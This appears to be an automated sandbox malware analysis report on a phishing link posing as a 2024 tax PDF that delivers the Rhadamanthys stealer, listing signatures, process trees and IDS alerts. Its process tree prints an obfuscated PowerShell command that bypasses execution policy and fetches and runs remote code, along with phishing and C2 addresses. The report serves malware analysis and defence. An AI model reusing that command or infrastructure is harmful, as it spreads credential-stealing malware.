Windows
Analysis Report
https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf
Overview
General Information
Detection
RHADAMANTHYS
Score: 100
Range: 0 - 100
Confidence: 100%
Signatures
Early bird code injection technique detected
Suricata IDS alerts for network traffic
Yara detected RHADAMANTHYS Stealer
AI detected suspicious Javascript
Blob-based file download detected
Bypasses PowerShell execution policy
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Queues an APC in another process (thread injection)
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dllhost Internet Connection
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Classification
- System is w10x64_ra
chrome.exe (PID: 6252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
chrome.exe (PID: 6476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,15029846499362184093,17269988125576325568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
chrome.exe (PID: 7136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf" MD5: E81F54E6C1129887AEA47E7D092680BF)
svchost.exe (PID: 3940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
rundll32.exe (PID: 8140 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
wscript.exe (PID: 5164 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\Amanda_Taylor_Tax_Document_2024.pdf .js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
powershell.exe (PID: 2324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://cpa12-march.blogspot.com/faqeeer.pdf);Start-Sleep -Seconds 6; MD5: 04029E121A0CFA5991749937DD22A1D9)
conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
RegSvcs.exe (PID: 7536 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
svchost.exe (PID: 2984 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
RegSvcs.exe (PID: 7564 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
dllhost.exe (PID: 1480 cmdline: "C:\Windows\System32\dllhost.exe" MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
svchost.exe (PID: 7716 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
chrome.exe (PID: 2708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" MD5: E81F54E6C1129887AEA47E7D092680BF)
chrome.exe (PID: 7912 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr357C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1a18e89c/c6c2e3f9" MD5: E81F54E6C1129887AEA47E7D092680BF)
chrome.exe (PID: 4620 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2316,i,14866277002353003105,15716734756151876631,262144 --variations-seed-version --mojo-platform-channel-handle=2532 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
msedge.exe (PID: 7464 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr5152.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1a18e89c/d8d6519b" MD5: 69222B8101B0601CC6663F8381E7E00F)
msedge.exe (PID: 2928 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2492 --field-trial-handle=1996,i,2173057654512074534,17827567997929056838,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
RegSvcs.exe (PID: 7540 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
RegSvcs.exe (PID: 7576 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
dw20.exe (PID: 1356 cmdline: dw20.exe -x -s 940 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
RegSvcs.exe (PID: 7492 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
RegSvcs.exe (PID: 7580 cmdline: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" MD5: 3A77A4F220612FA55118FB8D7DDAE83C)
dw20.exe (PID: 1156 cmdline: dw20.exe -x -s 936 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
MSBuild.exe (PID: 7504 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)
dw20.exe (PID: 4000 cmdline: dw20.exe -x -s 680 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
MSBuild.exe (PID: 4816 cmdline: "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe" MD5: 84C42D0F2C1AE761BEF884638BC1EACD)
dw20.exe (PID: 6028 cmdline: dw20.exe -x -s 816 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
elevation_service.exe (PID: 4972 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)
elevation_service.exe (PID: 2784 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)
elevation_service.exe (PID: 3760 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)
elevation_service.exe (PID: 8140 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: BF076931DBBF2CA64F5835A94A11DD46)
notepad.exe (PID: 7928 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Temp\user-PC-20250307-1017.log MD5: 27F71B12CB585541885A31BE22F61C83)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Rhadamanthys | According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine. | | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: frack113: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: bartblaze: |
Source: | Author: frack113, Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-14T18:34:44.797923+0100 | 2047905 | 1 | A Network Trojan was detected | 192.168.2.16 | 49758 | 216.58.206.33 | 443 | TCP |
2025-03-14T18:34:09.778041+0100 | 2823606 | 1 | Exploit Kit Activity Detected | 45.223.19.158 | 443 | 192.168.2.16 | 49735 | TCP |
2025-03-14T18:36:00.075171+0100 | 2854824 | 2 | Potentially Bad Traffic | 185.208.159.170 | 2484 | 192.168.2.16 | 49797 | TCP |
2025-03-14T18:36:08.952011+0100 | 2854824 | 2 | Potentially Bad Traffic | 185.208.159.170 | 2484 | 192.168.2.16 | 49805 | TCP |
2025-03-14T18:36:15.642496+0100 | 2854824 | 2 | Potentially Bad Traffic | 185.208.159.170 | 2484 | 192.168.2.16 | 49806 | TCP |
2025-03-14T18:34:44.797923+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49758 | 216.58.206.33 | 443 | TCP |
2025-03-14T18:35:17.171651+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 2484 | 192.168.2.16 | 49775 | TCP |
2025-03-14T18:36:00.075171+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 2484 | 192.168.2.16 | 49797 | TCP |
2025-03-14T18:36:08.952011+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 2484 | 192.168.2.16 | 49805 | TCP |
2025-03-14T18:36:15.642496+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 2484 | 192.168.2.16 | 49806 | TCP |
2025-03-14T18:36:21.220893+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.2.16 | 49807 | TCP |
2025-03-14T18:36:28.807419+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.2.16 | 49812 | TCP |
2025-03-14T18:36:34.666437+0100 | 2854802 | 1 | Domain Observed Used for C2 Detected | 185.208.159.170 | 443 | 192.168.2.16 | 49813 | TCP |
2025-03-14T18:34:43.368533+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49757 | 216.58.206.33 | 443 | TCP |
2025-03-14T18:34:44.797923+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49758 | 216.58.206.33 | 443 | TCP |
2025-03-14T18:34:46.460713+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49759 | 185.166.143.49 | 443 | TCP |
- Phishing
- Compliance
- Spreading
- Software Vulnerabilities
- Networking
- Key, Mouse, Clipboard, Microphone and Screen Capturing
- System Summary
- Boot Survival
- Hooking and other Techniques for Hiding and Protection
- Malware Analysis System Evasion
- Anti Debugging
- HIPS / PFW / Operating System Protection Evasion
- Language, Device and Operating System Detection
- Stealing of Sensitive Information
- Remote Access Functionality
Phishing |
---|
Source: | Joe Sandbox AI: | ||
Source: | Joe Sandbox AI: | ||
Source: | Joe Sandbox AI: | ||
Source: | Joe Sandbox AI: | ||
Source: | Joe Sandbox AI: | ||
Source: | Joe Sandbox AI: | ||
Source: | Joe Sandbox AI: | ||
Source: | Joe Sandbox AI: | ||
Source: | Joe Sandbox AI: |
Source: | HTTP Parser: |
Source: | File opened: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Software Vulnerabilities |
---|
Source: | Child: |
Source: | Memory has grown: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |